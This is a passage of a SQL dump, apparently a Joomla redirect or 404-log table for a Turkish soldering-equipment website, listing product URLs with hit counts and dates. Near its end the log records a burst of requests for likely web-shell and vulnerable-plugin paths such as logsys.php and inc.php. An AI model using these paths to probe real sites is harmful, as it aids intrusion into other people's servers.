00:00:00',301),(15930,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme',NULL,'','',8,0,'2017-12-10 07:21:27','0000-00-00 00:00:00',301),(15931,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/tolo',NULL,'','',6,0,'2017-12-10 07:26:01','0000-00-00 00:00:00',301),(15932,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-10 07:32:10','0000-00-00 00:00:00',301),(15933,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-10 07:36:45','0000-00-00 00:00:00',301),(15934,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_sku?language=tr-tr',NULL,'','',25,0,'2017-12-10 08:14:26','0000-00-00 00:00:00',301),(15935,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-12-10 08:19:12','0000-00-00 00:00:00',301),(15936,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-10 08:40:16','0000-00-00 00:00:00',301),(15937,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-10 09:09:27','0000-00-00 00:00:00',301),(15938,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_sku?language=tr-tr',NULL,'','',13,0,'2017-12-10 09:29:49','0000-00-00 00:00:00',301),(15939,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name/dirdesc?language=tr-tr',NULL,'','',26,0,'2017-12-10 10:25:01','0000-00-00 00:00:00',301),(15940,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_sku',NULL,'','',36,0,'2017-12-10 10:25:44','0000-00-00 00:00:00',301),(15941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/dirdesc',NULL,'','',3,0,'2017-12-10 10:37:07','0000-00-00 00:00:00',301),(15942,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-10 10:47:12','0000-00-00 00:00:00',301),(15943,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,`p`.product_sku',NULL,'','',4,0,'2017-12-10 11:06:12','0000-00-00 00:00:00',301),(15944,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',7,0,'2017-12-10 11:25:40','0000-00-00 00:00:00',301),(15945,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez5/home-page-beez5/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',24,0,'2017-12-10 11:42:27','0000-00-00 00:00:00',301),(15946,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-10 11:56:45','0000-00-00 00:00:00',301),(15947,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=tr-tr',NULL,'','',25,0,'2017-12-10 12:10:00','0000-00-00 00:00:00',301),(15948,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',1,0,'2017-12-10 12:43:11','0000-00-00 00:00:00',301),(15949,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-5?language=en-gb',NULL,'','',3,0,'2017-12-10 12:54:47','0000-00-00 00:00:00',301),(15950,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/aqueous',NULL,'','',1,0,'2017-12-10 13:00:59','0000-00-00 00:00:00',301),(15951,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_sku?language=tr-tr',NULL,'','',6,0,'2017-12-10 13:12:31','0000-00-00 00:00:00',301),(15952,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2017-12-10 13:18:01','0000-00-00 00:00:00',301),(15953,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc',NULL,'','',4,0,'2017-12-10 13:29:38','0000-00-00 00:00:00',301),(15954,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-10 13:58:46','0000-00-00 00:00:00',301),(15955,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim',NULL,'','',1,0,'2017-12-10 14:02:27','0000-00-00 00:00:00',301),(15956,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name?language=en-gb',NULL,'','',24,0,'2017-12-10 14:15:11','0000-00-00 00:00:00',301),(15957,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-12-10 14:38:21','0000-00-00 00:00:00',301),(15958,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-10 14:50:55','0000-00-00 00:00:00',301),(15959,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-10 15:09:29','0000-00-00 00:00:00',301),(15960,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',10,0,'2017-12-10 15:14:09','0000-00-00 00:00:00',301),(15961,'http://www.3s-technologies.com.tr/tr/urunler/jvk-detail?tmpl=component&print=1',NULL,'','',37,0,'2017-12-10 15:37:13','0000-00-00 00:00:00',301),(15962,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-10 15:40:07','0000-00-00 00:00:00',301),(15963,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-10?language=en-gb',NULL,'','',5,0,'2017-12-10 15:48:59','0000-00-00 00:00:00',301),(15964,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name',NULL,'','',4,0,'2017-12-10 16:00:35','0000-00-00 00:00:00',301),(15965,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/dirdesc',NULL,'','',4,0,'2017-12-10 16:12:12','0000-00-00 00:00:00',301),(15966,'http://www.3s-technologies.com.tr/en/products/manufacturer/screen-printer/by,`p`.product_sku',NULL,'','',2,0,'2017-12-10 17:30:06','0000-00-00 00:00:00',301),(15967,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-10 17:45:06','0000-00-00 00:00:00',301),(15968,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-10 17:56:43','0000-00-00 00:00:00',301),(15969,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-10 18:14:20','0000-00-00 00:00:00',301),(15970,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,ordering',NULL,'','',1,0,'2017-12-10 18:19:56','0000-00-00 00:00:00',301),(15971,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,category_name?language=en-gb',NULL,'','',24,0,'2017-12-10 18:55:45','0000-00-00 00:00:00',301),(15972,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-10 19:49:09','0000-00-00 00:00:00',301),(15973,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/aqueous',NULL,'','',43,0,'2017-12-10 20:04:13','0000-00-00 00:00:00',301),(15974,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-10?language=en-gb',NULL,'','',4,0,'2017-12-10 20:04:27','0000-00-00 00:00:00',301),(15975,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-10 20:07:29','0000-00-00 00:00:00',301),(15976,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-10 20:39:17','0000-00-00 00:00:00',301),(15977,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,ordering?language=en-gb',NULL,'','',23,0,'2017-12-10 20:51:26','0000-00-00 00:00:00',301),(15978,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/screen-printer',NULL,'','',25,0,'2017-12-10 20:53:08','0000-00-00 00:00:00',301),(15979,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name?language=en-gb',NULL,'','',23,0,'2017-12-10 21:48:16','0000-00-00 00:00:00',301),(15980,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?category_name&language=en-gb',NULL,'','',1,0,'2017-12-10 22:06:22','0000-00-00 00:00:00',301),(15981,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-12-10 22:07:21','0000-00-00 00:00:00',301),(15982,'http://www.3s-technologies.com.tr/index.php/en/products/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-10 22:08:36','0000-00-00 00:00:00',301),(15983,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail',NULL,'','',50,0,'2017-12-10 22:14:20','0000-00-00 00:00:00',301),(15984,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-10',NULL,'','',2,0,'2017-12-10 22:48:57','0000-00-00 00:00:00',301),(15985,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-10 23:01:26','0000-00-00 00:00:00',301),(15986,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2017-12-10 23:48:33','0000-00-00 00:00:00',301),(15987,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-10 23:53:06','0000-00-00 00:00:00',301),(15988,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-11 00:03:57','0000-00-00 00:00:00',301),(15989,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/asp-300-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-11 00:13:39','0000-00-00 00:00:00',301),(15990,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/results,1-40',NULL,'','',3,0,'2017-12-11 00:48:59','0000-00-00 00:00:00',301),(15991,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-11 00:50:18','0000-00-00 00:00:00',301),(15992,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',23,0,'2017-12-11 00:58:48','0000-00-00 00:00:00',301),(15993,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,mf_name',NULL,'','',5,0,'2017-12-11 01:03:57','0000-00-00 00:00:00',301),(15994,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-11 01:18:57','0000-00-00 00:00:00',301),(15995,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,category_name?language=en-gb',NULL,'','',25,0,'2017-12-11 02:10:52','0000-00-00 00:00:00',301),(15996,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-20',NULL,'','',8,0,'2017-12-11 02:33:57','0000-00-00 00:00:00',301),(15997,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-11 02:35:17','0000-00-00 00:00:00',301),(15998,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',201,0,'2017-12-11 03:28:42','0000-00-00 00:00:00',301),(15999,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-10',NULL,'','',6,0,'2017-12-11 04:33:56','0000-00-00 00:00:00',301),(16000,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',205,0,'2017-12-11 04:48:32','0000-00-00 00:00:00',301),(16001,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-11 04:48:56','0000-00-00 00:00:00',301),(16002,'http://www.3s-technologies.com.tr/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',36,0,'2017-12-11 05:36:46','0000-00-00 00:00:00',301),(16003,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-11 05:39:31','0000-00-00 00:00:00',301),(16004,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,`p`.product_sku',NULL,'','',1,0,'2017-12-11 06:24:40','0000-00-00 00:00:00',301),(16005,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-detail',NULL,'','',7,0,'2017-12-11 06:41:33','0000-00-00 00:00:00',301),(16006,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-40',NULL,'','',1,0,'2017-12-11 06:48:57','0000-00-00 00:00:00',301),(16007,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-11 07:06:24','0000-00-00 00:00:00',301),(16008,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-12-11 07:11:25','0000-00-00 00:00:00',301),(16009,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-11 07:35:37','0000-00-00 00:00:00',301),(16010,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-100',NULL,'','',1,0,'2017-12-11 08:08:56','0000-00-00 00:00:00',301),(16011,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-11 08:23:43','0000-00-00 00:00:00',301),(16012,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-11 08:48:56','0000-00-00 00:00:00',301),(16013,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name/results,1-5',NULL,'','',11,0,'2017-12-11 08:58:56','0000-00-00 00:00:00',301),(16014,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',224,0,'2017-12-11 09:04:10','0000-00-00 00:00:00',301),(16015,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-12-11 09:04:27','0000-00-00 00:00:00',301),(16016,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-11 09:18:56','0000-00-00 00:00:00',301),(16017,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/spr-25_250x250.jpg',NULL,'','',2,0,'2017-12-11 10:06:40','0000-00-00 00:00:00',301),(16018,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name',NULL,'','',4,0,'2017-12-11 10:18:55','0000-00-00 00:00:00',301),(16019,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-11 10:48:56','0000-00-00 00:00:00',301),(16020,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-11 12:08:58','0000-00-00 00:00:00',301),(16021,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&itemid=28&lang=tr',NULL,'','',4,0,'2017-12-11 12:19:00','0000-00-00 00:00:00',301),(16022,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2017-12-11 12:48:55','0000-00-00 00:00:00',301),(16023,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-11 13:38:57','0000-00-00 00:00:00',301),(16024,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-12-11 14:02:41','0000-00-00 00:00:00',301),(16025,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',2,0,'2017-12-11 14:08:55','0000-00-00 00:00:00',301),(16026,'http://www.3s-technologies.com.tr/en/products/smd-orta-hä±zlä±/mx200lp-detail',NULL,'','',1,0,'2017-12-11 14:34:31','0000-00-00 00:00:00',301),(16027,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-10',NULL,'','',8,0,'2017-12-11 16:20:44','0000-00-00 00:00:00',301),(16028,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',3,0,'2017-12-11 16:41:38','0000-00-00 00:00:00',301),(16029,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-11 17:47:05','0000-00-00 00:00:00',301),(16030,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-20',NULL,'','',4,0,'2017-12-11 17:55:16','0000-00-00 00:00:00',301),(16031,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-10',NULL,'','',4,0,'2017-12-11 18:03:06','0000-00-00 00:00:00',301),(16032,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name/results,1-50',NULL,'','',3,0,'2017-12-11 18:36:11','0000-00-00 00:00:00',301),(16033,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-11 19:08:54','0000-00-00 00:00:00',301),(16034,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/dirdesc/results,1-5',NULL,'','',6,0,'2017-12-11 19:25:16','0000-00-00 00:00:00',301),(16035,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-11 20:14:21','0000-00-00 00:00:00',301),(16036,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-11 20:14:58','0000-00-00 00:00:00',301),(16037,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-12-11 20:32:54','0000-00-00 00:00:00',301),(16038,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',206,0,'2017-12-11 20:55:15','0000-00-00 00:00:00',301),(16039,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-11 21:19:48','0000-00-00 00:00:00',301),(16040,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku/results,1-5',NULL,'','',2,0,'2017-12-11 21:47:14','0000-00-00 00:00:00',301),(16041,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,ordering/results,1-5',NULL,'','',1,0,'2017-12-11 22:17:04','0000-00-00 00:00:00',301),(16042,'http://3s-technologies.com.tr/index.php/tr/ueruenler/am100-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-12-11 22:49:31','0000-00-00 00:00:00',301),(16043,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',1,0,'2017-12-12 00:11:20','0000-00-00 00:00:00',301),(16044,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/results,1-20',NULL,'','',3,0,'2017-12-12 01:00:26','0000-00-00 00:00:00',301),(16045,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,ordering',NULL,'','',1,0,'2017-12-12 01:20:43','0000-00-00 00:00:00',301),(16046,'http://3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/results,1-5',NULL,'','',1,0,'2017-12-12 02:46:21','0000-00-00 00:00:00',301),(16047,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,ordering/results,1-20',NULL,'','',1,0,'2017-12-12 02:56:04','0000-00-00 00:00:00',301),(16048,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-12 02:56:28','0000-00-00 00:00:00',301),(16049,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&itemid=149&lang=tr',NULL,'','',35,0,'2017-12-12 03:09:16','0000-00-00 00:00:00',301),(16050,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-12 03:15:32','0000-00-00 00:00:00',301),(16051,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku/results,1-50',NULL,'','',2,0,'2017-12-12 03:25:16','0000-00-00 00:00:00',301),(16052,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n/gf-12-hc-ht-detail',NULL,'','',4,0,'2017-12-12 03:36:57','0000-00-00 00:00:00',301),(16053,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',28,0,'2017-12-12 03:51:46','0000-00-00 00:00:00',301),(16054,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,ordering/results,1-50',NULL,'','',1,0,'2017-12-12 05:22:01','0000-00-00 00:00:00',301),(16055,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,ordering/results,1-10',NULL,'','',2,0,'2017-12-12 05:35:12','0000-00-00 00:00:00',301),(16056,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-50',NULL,'','',5,0,'2017-12-12 05:41:28','0000-00-00 00:00:00',301),(16057,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku/results,1-10',NULL,'','',1,0,'2017-12-12 05:51:12','0000-00-00 00:00:00',301),(16058,'https://www.3s-technologies.com.tr/tr/urunler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-12 05:54:14','0000-00-00 00:00:00',301),(16059,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-12 06:42:13','0000-00-00 00:00:00',301),(16060,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-12 06:59:18','0000-00-00 00:00:00',301),(16061,'http://3s-technologies.com.tr/xml.php',NULL,'3s-technologies.com.tr','',9,0,'2017-12-12 07:02:40','0000-00-00 00:00:00',301),(16062,'http://3s-technologies.com.tr/index.php/en/products/jvk-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-12 07:06:41','0000-00-00 00:00:00',301),(16063,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-12-12 07:44:58','0000-00-00 00:00:00',301),(16064,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,product_sku',NULL,'','',1,0,'2017-12-12 07:57:41','0000-00-00 00:00:00',301),(16065,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_sku/results,1-5',NULL,'','',1,0,'2017-12-12 08:07:24','0000-00-00 00:00:00',301),(16066,'http://www.3s-technologies.com.tr/en/products/avf-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-12 08:25:42','0000-00-00 00:00:00',301),(16067,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-12 08:36:36','0000-00-00 00:00:00',301),(16068,'http://3s-technologies.com.tr/wp-content/plugins/wp-db-ajax-made/logsys.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:49:15','0000-00-00 00:00:00',301),(16069,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt','',7,0,'2017-12-12 08:50:22','0000-00-00 00:00:00',301),(16070,'http://3s-technologies.com.tr/lnc.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:50:35','0000-00-00 00:00:00',301),(16071,'http://3s-technologies.com.tr/tmp/logsys.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:51:16','0000-00-00 00:00:00',301),(16072,'http://3s-technologies.com.tr/wp-includes/theme-compat/logsys.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:52:31','0000-00-00 00:00:00',301),(16073,'http://3s-technologies.com.tr/images/stories/inc.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:52:42','0000-00-00 00:00:00',301),(16074,'http://3s-technologies.com.tr/wp-content/plugins/nextgen-gallery/logsys.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:52:47','0000-00-00 00:00:00',301),(16075,'http://3s-technologies.com.tr/wp-content/uploads/2014/12/inc.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:53:07','0000-00-00 00:00:00',301),(16076,'http://3s-technologies.com.tr/logsys.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:54:30','0000-00-00 00:00:00',301),(16077,'http://3s-technologies.com.tr/cron.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:54:39','0000-00-00 00:00:00',301),(16078,'http://3s-technologies.com.tr/images/inc.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-12 08:55:00','0000-00-00 00:00:00',301),(16079,'http://www.3s-technologies.com.tr/en/wp-content/upgrade/theme-compat/popup-pomo.php',NULL,'http://www.3s-technologies.com.tr/wp-content/upgrade/theme-compat/popup-pomo.php','',1,0,'2017-12-12 08:58:16','0000-00-00 00:00:00',301),(16080,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_sku/results,1-20',NULL,'','',3,0,'2017-12-12 09:34:59','0000-00-00 